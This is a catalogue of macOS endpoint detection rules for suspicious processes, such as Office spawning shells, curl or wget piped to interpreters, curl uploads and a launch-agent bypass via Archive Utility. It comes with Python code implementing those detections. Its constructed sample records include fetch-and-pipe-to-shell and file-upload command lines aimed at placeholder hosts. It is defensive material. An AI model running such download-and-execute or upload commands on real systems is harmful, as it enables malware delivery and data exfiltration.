Mac Suspicious Process

These detections identify suspicious activity from process start records collected by the Insight Agent from macOS endpoints.

Attacker Tools - Cobalt Strike Client Application - Mac

Description

This detection identifies use of the penetration testing/post-exploitation framework Cobalt Strike (the client application). It is specific to macOS.

Recommendation

Investigate the process events to identify if this activity is authorized and expected within the client network.

Attacker Tools - Cobalt Strike Client Update - Mac

Description

This detection identifies use of the penetration testing/post-exploitation framework Cobalt Strike (the client update). It is specific to macOS.

Recommendation

Investigate the process events to identify if this activity is authorized and expected within the client network.

macOS Suspicious Process - chmod & nohup

Description

This detection identifies chmod being executed, followed by a file being executed with nohup, in the same command line. This has been observed in macOS malware, notably Shlayer, as a method of execution.

Recommendation

Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Unix Shell - T1059.004
  • File and Directory Permissions Modification - T1222

macOS Suspicious Process - Killall Terminal

Description

This detection identifies the killall command being used to kill any instances of the macOS Terminal that are running. This may be done to stop an earlier stage of the malware from continuing to execute, or as an anti-analysis technique.

Recommendation

Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Disable or Modify Tools - T1562.001

macOS Suspicious Process - Tail Piping to Funzip

Description

This detection identifies the 'tail -c' command being used to output a specified number of bytes from the end of a file, with that output then piped to the 'funzip' utility to decompress the data. This has been observed in macOS malware that hides a zipped binary at the end of a bash script, uses tail to output only the zip portion of the script file, decompresses it, and executes it.

Recommendation

Investigate the file that the 'tail' command is being used on. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Deobfuscate/Decode Files or Information - T1140
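
The three command-line patterns in the "macOS Suspicious Process" entries above (chmod followed by nohup, killall Terminal, and tail -c piped into funzip) can be evaluated against process start records with the rules below. This is an added example written for this page, not Rapid7's detection logic; the record format (one dict per process start with 'process_name', 'parent_name' and 'cmdline') is an assumption, the rule names are the detection titles on this page, and every sample record is constructed.

```python
"""Added example, not Rapid7's detection logic: evaluate the chmod+nohup,
killall Terminal and tail -c | funzip patterns against process start records.

Assumed record format: one dict per process start with the keys
'process_name', 'parent_name' and 'cmdline'. Sample records are constructed."""
import os
import shlex

SEPARATORS = {"|", "||", "&&", ";", "&"}   # shell operators that end a stage
SHELLS = {"sh", "bash", "zsh"}


def _base(argv):
    """Executable name of a stage, without its directory."""
    return os.path.basename(argv[0]) if argv else ""


def _split(cmdline):
    """Tokenize a command line into [(argv, operator), ...], where operator is
    the shell operator that follows the stage ('' for the last one).
    punctuation_chars makes shlex emit '|', '&&', ';' as their own tokens, so
    'file|funzip' is split correctly even without surrounding spaces."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    lex.commenters = ""            # a '#' in a command line is not a comment here
    try:
        tokens = list(lex)
    except ValueError:             # unbalanced quotes: degrade to plain splitting
        tokens = cmdline.split()
    stages, current = [], []
    for tok in tokens:
        if tok in SEPARATORS:
            if current:
                stages.append((current, tok))
            current = []
        elif tok not in ("(", ")"):
            current.append(tok)
    if current:
        stages.append((current, ""))
    return stages


def split_pipeline(cmdline):
    """Like _split, but expands 'sh -c "..."' so the rules see the inner
    command, which is how installers usually run these one-liners."""
    expanded = []
    for argv, op in _split(cmdline):
        if _base(argv) in SHELLS and "-c" in argv[1:-1]:
            inner = _split(argv[argv.index("-c") + 1])
            if inner:
                inner[-1] = (inner[-1][0], op)   # inherit the outer operator
            expanded.extend(inner)
        else:
            expanded.append((argv, op))
    return expanded


def chmod_then_nohup(stages):
    """chmod on a file, then nohup later in the same command line."""
    seen_chmod = False
    for argv, _ in stages:
        name = _base(argv)
        if name == "chmod":
            seen_chmod = True
        elif name == "nohup" and seen_chmod:
            return True
    return False


def killall_terminal(stages):
    """killall aimed at the Terminal application."""
    return any(_base(argv) == "killall" and "Terminal" in argv[1:]
               for argv, _ in stages)


def tail_piped_to_funzip(stages):
    """'tail -c N file | funzip': a byte-count tail whose output feeds funzip."""
    for (argv, op), (nxt, _) in zip(stages, stages[1:]):
        if (_base(argv) == "tail" and op == "|" and _base(nxt) == "funzip"
                and any(a.startswith("-c") for a in argv[1:])):
            return True
    return False


RULES = {
    "macOS Suspicious Process - chmod & nohup": chmod_then_nohup,
    "macOS Suspicious Process - Killall Terminal": killall_terminal,
    "macOS Suspicious Process - Tail Piping to Funzip": tail_piped_to_funzip,
}


def evaluate(record):
    """Names of the rules that fire on one process start record."""
    stages = split_pipeline(record["cmdline"])
    return [name for name, rule in RULES.items() if rule(stages)]


def scan(records):
    """(cmdline, fired rule names) for every record that triggers a rule."""
    hits = []
    for r in records:
        fired = evaluate(r)
        if fired:
            hits.append((r["cmdline"], fired))
    return hits


# Constructed sample records (not real telemetry).
SAMPLE_RECORDS = [
    {"process_name": "sh", "parent_name": "Installer",
     "cmdline": "sh -c 'chmod +x /tmp/.p/Player && nohup /tmp/.p/Player &'"},
    {"process_name": "killall", "parent_name": "Player", "cmdline": "killall Terminal"},
    {"process_name": "tail", "parent_name": "sh",
     "cmdline": "tail -c 24576 /Users/alice/Downloads/Install.sh|funzip > /tmp/.p/Player"},
    {"process_name": "chmod", "parent_name": "Terminal", "cmdline": "chmod 644 /Users/alice/notes.txt"},
    {"process_name": "tail", "parent_name": "Terminal", "cmdline": "tail -n 20 /var/log/system.log"},
]

if __name__ == "__main__":
    for cmdline, fired in scan(SAMPLE_RECORDS):
        print(fired, "<-", cmdline)
```

The stage split matters more than the keywords: chmod and nohup in one command line is the signal, whereas chmod and nohup in two unrelated records from a developer's shell session is normal, and the ordering check (chmod before nohup) drops the most common benign overlap. The tail rule also insists on a real pipe operator rather than any co-occurrence of the two words.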

Malicious Document - Microsoft Office for macOS spawns curl

Description

Crafted malicious documents targeting macOS have been observed using curl to download a second-stage payload from a remote server.

Additional information can be found at: https://labs.sentinelone.com/lazarus-apt-targets-mac-users-poisoned-word-document/

Recommendation

Examine the parent process that spawned the process in question, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105
  • Spearphishing Attachment - T1598.002

Malicious Document - Microsoft Office for macOS spawns Python

Description

This detection identifies Microsoft Office for macOS launching Python. Crafted malicious documents targeting macOS have been observed using Python to execute malicious code.

Recommendation

Examine the code passed to the Python process, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Python - T1059.006
  • Spearphishing Attachment - T1598.002

Malicious Document - Word for macOS spawns perl

Description

This detection identifies Word spawning perl. This has been observed in use by malicious documents targeting macOS from attacker groups including Ocean Lotus (APT32).

Recommendation

Examine the commands being passed to Perl, and any process that Perl may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Spearphishing Attachment - T1598.002

Malicious Document - Word for macOS spawns shell

Description

This detection identifies Word spawning sh, bash, or zsh. This has been observed in use by malicious documents targeting macOS from malicious groups including Ocean Lotus (APT32).

Recommendation

Determine what is being executed by the shell. Examine any processes spawned by Word. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Spearphishing Attachment - T1598.002

Malicious Document - Word or Excel for macOS opens slk file

Description

.slk files are a symbolic link (SYLK) format that dates back to MS-DOS. They are still supported in Office products and can be used by a malicious actor to deliver macros that Microsoft Word or Excel will open.

Recommendation

Examine any processes launched by Word or Excel, and any process that those processes may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Spearphishing Attachment - T1598.002

Suspicious MacOS Process - launchd starts Archive Utility

Description

To bypass defenses around creating launch agents, a malicious actor can create a login item that points to a zip file in ~/Library containing a folder named LaunchAgents, which in turn contains a launch agent plist file. Since this is neither a script nor an executable, the operating system allows it, and the archive is opened with the default handler on login. The default macOS Archive Utility, which is trusted by the operating system, opens the archive and writes the plist file it contains to ~/Library/LaunchAgents, which is normally not writable by unprivileged users or untrusted binaries. This causes whatever the plist file specifies to launch at the next login.

Additional information can be found at https://objective-see.com/blog/blog_0x4B.html

Recommendation

Inspect the created plist file. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Launchctl - T1569.001

Suspicious Process - Curl Downloading From Cloudfront URL

Description

This detection identifies the 'curl' command being used to download data from a CloudFront URL. Malicious actors have been observed using 'curl' to download second stage payloads from CloudFront.

Recommendation

Investigate the contents of the CloudFront URL. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Web Service - T1102
  • Ingress Tool Transfer - T1105

Suspicious Process - Curl Output Piped to Bash

Description

This detection identifies output from the Curl utility being piped to bash or another shell process. Malicious actors may use Curl to download additional malware, and pipe that malware to bash for execution.

Recommendation

Investigate the URL that was downloaded from. Examine any additional processes spawned by the shell process that Curl spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Unix Shell - T1059.004
  • Ingress Tool Transfer - T1105

Suspicious Process - Curl Output Piped to Perl

Description

This detection identifies output from the Curl utility being piped to Perl. Malicious actors may use Curl to download additional malware, and pipe that malware to Perl for execution.

Recommendation

Investigate the URL that was downloaded from. Examine any additional processes spawned by the Perl process that Curl spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105

Suspicious Process - Curl Output Piped to Python

Description

This detection identifies output from the Curl utility being piped to Python. Malicious actors may use Curl to download additional malware, and pipe that malware to Python for execution.

Recommendation

Investigate the URL that was downloaded from. Examine any additional processes spawned by the Python process that Curl spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Python - T1059.006
  • Ingress Tool Transfer - T1105

Suspicious Process - curl --upload-file

Description

Malware has been observed using curl --upload-file with no username specified to exfiltrate data to an attacker-controlled server.

This activity has specifically been identified in the CookieMiner malware for macOS: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

Recommendation

Examine the parent process that spawned the process in question, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041
  • Exfiltration Over Web Service - T1567

Suspicious Process - Office for macOS Launching OSAScript

Description

This detection identifies Microsoft Office processes launching OSAScript. OSAScript is a command line utility for executing AppleScript, which attackers may use for malicious purposes.

Recommendation

Attempt to identify the document that caused this activity to occur. Investigate the contents of the AppleScript being run. Examine any processes that may have been launched by OSAScript. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • AppleScript - T1059.002
  • Spearphishing Attachment - T1566.001
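
The "Malicious Document" entries above (Office or Word spawning curl, Python, perl, or a shell), this OSAScript entry, and the launchd-starts-Archive-Utility entry are all parent/child process rules, so one rule table covers them. The code below is an added example written for this page, not Rapid7's detection logic; the record format (one dict per process start with 'pid', 'ppid', 'process_name', 'parent_name' and 'cmdline') is an assumption, the rule names are this page's detection titles, and the sample records are constructed. It also includes the triage helper the recommendations keep asking for: listing every process a flagged process went on to spawn.

```python
"""Added example, not Rapid7's detection logic: parent/child rules for the
Office-spawns-interpreter, Office-launches-OSAScript and launchd-starts-
Archive-Utility detections, plus a descendant walk for triage.

Assumed record format: one dict per process start with 'pid', 'ppid',
'process_name', 'parent_name' and 'cmdline'. Sample records are constructed."""
import os
import re

OFFICE = {"Microsoft Word", "Microsoft Excel", "Microsoft PowerPoint", "Microsoft Outlook"}
WORD = {"Microsoft Word"}

# (rule name, allowed parent names, regex the child's executable name must match)
PARENT_CHILD_RULES = [
    ("Malicious Document - Microsoft Office for macOS spawns curl", OFFICE, r"curl"),
    ("Malicious Document - Microsoft Office for macOS spawns Python", OFFICE, r"python[\d.]*"),
    ("Malicious Document - Word for macOS spawns perl", WORD, r"perl[\d.]*"),
    ("Malicious Document - Word for macOS spawns shell", WORD, r"(ba|z)?sh"),
    ("Suspicious Process - Office for macOS Launching OSAScript", OFFICE, r"osascript"),
    ("Suspicious MacOS Process - launchd starts Archive Utility", {"launchd"}, r"Archive Utility"),
]


def evaluate(record):
    """Rule names that fire for one process start record."""
    child = os.path.basename(record["process_name"])
    parent = os.path.basename(record["parent_name"])
    return [name for name, parents, child_re in PARENT_CHILD_RULES
            if parent in parents and re.fullmatch(child_re, child)]


def descendants(records, pid):
    """pids of every process spawned, directly or indirectly, by `pid`: the
    'any process that it may have spawned' the recommendations ask you to examine."""
    by_parent = {}
    for r in records:
        by_parent.setdefault(r["ppid"], []).append(r["pid"])
    found, queue = [], [pid]
    while queue:
        current = queue.pop(0)
        for child in by_parent.get(current, []):
            if child not in found:
                found.append(child)
                queue.append(child)
    return sorted(found)


def scan(records):
    """[(pid, rule name), ...] over all records, in record order."""
    return [(r["pid"], name) for r in records for name in evaluate(r)]


# Constructed sample records (not real telemetry); example.invalid never resolves.
SAMPLE_RECORDS = [
    {"pid": 1, "ppid": 0, "process_name": "launchd", "parent_name": "kernel_task",
     "cmdline": "/sbin/launchd"},
    {"pid": 501, "ppid": 1, "process_name": "Microsoft Word", "parent_name": "launchd",
     "cmdline": "/Applications/Microsoft Word.app/Contents/MacOS/Microsoft Word"},
    {"pid": 612, "ppid": 501, "process_name": "python3", "parent_name": "Microsoft Word",
     "cmdline": "python3 /Users/alice/Library/Caches/stage.py"},
    {"pid": 613, "ppid": 612, "process_name": "curl", "parent_name": "python3",
     "cmdline": "curl -s https://example.invalid/stage2 -o /tmp/stage2"},
    {"pid": 700, "ppid": 501, "process_name": "osascript", "parent_name": "Microsoft Word",
     "cmdline": "osascript -e 'display dialog \"Update required\"'"},
    {"pid": 800, "ppid": 1, "process_name": "Archive Utility", "parent_name": "launchd",
     "cmdline": "/System/Library/CoreServices/Applications/Archive Utility.app/Contents/MacOS/Archive Utility"},
    {"pid": 850, "ppid": 1, "process_name": "Terminal", "parent_name": "launchd",
     "cmdline": "Terminal"},
    {"pid": 900, "ppid": 850, "process_name": "curl", "parent_name": "Terminal",
     "cmdline": "curl -O https://example.invalid/notes.pdf"},
]

if __name__ == "__main__":
    for pid, name in scan(SAMPLE_RECORDS):
        print(f"pid {pid}: {name}; spawned {descendants(SAMPLE_RECORDS, pid)}")
```

Note that the curl child in the sample (pid 613) is not flagged by the curl rule because its direct parent is python3, not Word; it only surfaces through `descendants(SAMPLE_RECORDS, 501)`, which is exactly why the recommendations say to examine everything a flagged process spawned rather than stopping at the first hit. The launchd rule is the noisiest of the table: on macOS every application started through LaunchServices has launchd as its parent, so an Archive Utility start needs the login-item context from the description (the zip in ~/Library and the plist it writes) before it means anything.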

Suspicious Process - Silver Sparrow Filenames

Description

This detection identifies filenames known to be used by the Silver Sparrow malware for macOS.

More information can be found at https://redcanary.com/blog/clipping-silver-sparrows-wings/

Recommendation

Examine the parent process that spawned the process in question, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

Suspicious Process - Viewing macOS Quarantine Events

Description

This detection identifies SQL being used to read the contents of the macOS quarantine events database. Malicious programs have been observed doing this in order to view the URL they were downloaded from.

Recommendation

Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

Suspicious Process - WGet Output Piped to Bash

Description

This detection identifies output from the WGet utility being piped to bash or another shell process. Malicious actors may use WGet to download additional malware, and pipe that malware to bash for execution.

Recommendation

Investigate the URL that was downloaded from. Examine any additional processes spawned by the bash process that WGet spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105

Suspicious Process - WGet Output Piped to Perl

Description

This detection identifies output from the WGet utility being piped to Perl. Malicious actors may use WGet to download additional malware, and pipe that malware to Perl for execution.

Recommendation

Investigate the URL that was downloaded from. Examine any additional processes spawned by the Perl process that WGet spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105

Suspicious Process - WGet Output Piped to Python

Description

This detection identifies output from the WGet utility being piped to Python. Malicious actors may use WGet to download additional malware, and pipe that malware to Python for execution.

Recommendation

Investigate the URL that was downloaded from. Examine any additional processes spawned by the Python process that WGet spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105
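
The curl and wget entries on this page (Curl/WGet output piped to Bash, Perl or Python, Curl downloading from a CloudFront URL, and curl --upload-file with no username) share the same input, a single downloader command line, so they are collected into one set of checks below. This is an added example written for this page, not Rapid7's detection logic; the record format (one dict per process start with 'process_name' and 'cmdline') is an assumption, the rule names are this page's detection titles, and the sample records are constructed (example.invalid never resolves and the CloudFront hostname is made up).

```python
"""Added example, not Rapid7's detection logic: command-line checks for the
curl/wget detections on this page. Rule names are the page's detection titles.

Assumed record format: one dict per process start with 'process_name' and
'cmdline'. Sample records are constructed."""
import re
import shlex
from urllib.parse import urlsplit

DOWNLOADERS = {"curl": "Curl", "wget": "WGet"}
INTERPRETERS = {"sh": "Bash", "bash": "Bash", "zsh": "Bash", "perl": "Perl", "python": "Python"}

# downloader ... | interpreter; the interpreter may be given by path or versioned
PIPE_RE = re.compile(
    r"\b(?P<tool>curl|wget)\b[^|]*\|\s*(?:\S*/)?(?P<interp>bash|sh|zsh|perl|python)[\d.]*\b")


def tokens(cmdline):
    """argv-style tokens; degrade to whitespace splitting on unbalanced quotes."""
    try:
        return shlex.split(cmdline)
    except ValueError:
        return cmdline.split()


def _is_curl(argv):
    return bool(argv) and argv[0].rsplit("/", 1)[-1] == "curl"


def urls(argv):
    """Tokens that parse as http, https or ftp URLs."""
    found = []
    for tok in argv:
        try:
            u = urlsplit(tok)
        except ValueError:          # e.g. malformed IPv6 brackets
            continue
        if u.scheme in ("http", "https", "ftp"):
            found.append(u)
    return found


def piped_to_interpreter(record):
    """Download tool whose stdout is piped straight into a shell, Perl or Python."""
    m = PIPE_RE.search(record["cmdline"])
    if not m:
        return []
    return [f"Suspicious Process - {DOWNLOADERS[m['tool']]} Output Piped to {INTERPRETERS[m['interp']]}"]


def curl_cloudfront(record):
    """curl with any URL whose host is a CloudFront distribution."""
    argv = tokens(record["cmdline"])
    if _is_curl(argv) and any((u.hostname or "").endswith(".cloudfront.net") for u in urls(argv)):
        return ["Suspicious Process - Curl Downloading From Cloudfront URL"]
    return []


def curl_upload_no_user(record):
    """curl -T/--upload-file with no user given via -u/--user or URL userinfo."""
    argv = tokens(record["cmdline"])
    if not _is_curl(argv):
        return []
    uploads = any(a in ("-T", "--upload-file") or a.startswith("--upload-file=") for a in argv)
    has_user = (any(a in ("-u", "--user") or a.startswith("--user=") for a in argv)
                or any(u.username for u in urls(argv)))
    return ["Suspicious Process - curl --upload-file"] if uploads and not has_user else []


RULES = [piped_to_interpreter, curl_cloudfront, curl_upload_no_user]


def evaluate(record):
    """Names of every rule that fires on one record."""
    return [name for rule in RULES for name in rule(record)]


def scan(records):
    """(cmdline, fired rule names) for the records that trigger at least one rule."""
    hits = []
    for r in records:
        fired = evaluate(r)
        if fired:
            hits.append((r["cmdline"], fired))
    return hits


# Constructed sample records (not real telemetry).
SAMPLE_RECORDS = [
    {"process_name": "curl", "cmdline": "curl -fsSL https://d1a2b3c4example.cloudfront.net/u/a.sh | bash"},
    {"process_name": "wget", "cmdline": "wget -qO- http://example.invalid/p.pl | perl"},
    {"process_name": "curl", "cmdline": "/usr/bin/curl -s http://example.invalid/x.py|/usr/bin/python3"},
    {"process_name": "curl", "cmdline": "curl -T /tmp/archive.zip https://example.invalid/upload"},
    {"process_name": "curl", "cmdline": "curl -T /tmp/report.txt -u alice https://example.invalid/upload"},
    {"process_name": "curl", "cmdline": "curl -s https://example.invalid/index.html -o /tmp/index.html"},
]

if __name__ == "__main__":
    for cmdline, fired in scan(SAMPLE_RECORDS):
        print(fired, "<-", cmdline)
```

The pipe check is a regular expression over the raw command line because the `|` is the whole signal and a tokenizer adds nothing here; its known gap is an intermediary between the pipe and the interpreter (for example `| sudo bash`), which a practitioner would add as a second alternation rather than widen the regex. The CloudFront check is a host-suffix match on parsed URLs rather than a substring search, so `cloudfront.net` appearing in a query string or a path does not fire it, and the upload check treats both `-u`/`--user` and `user@host` userinfo as "username specified", matching the wording of the detection.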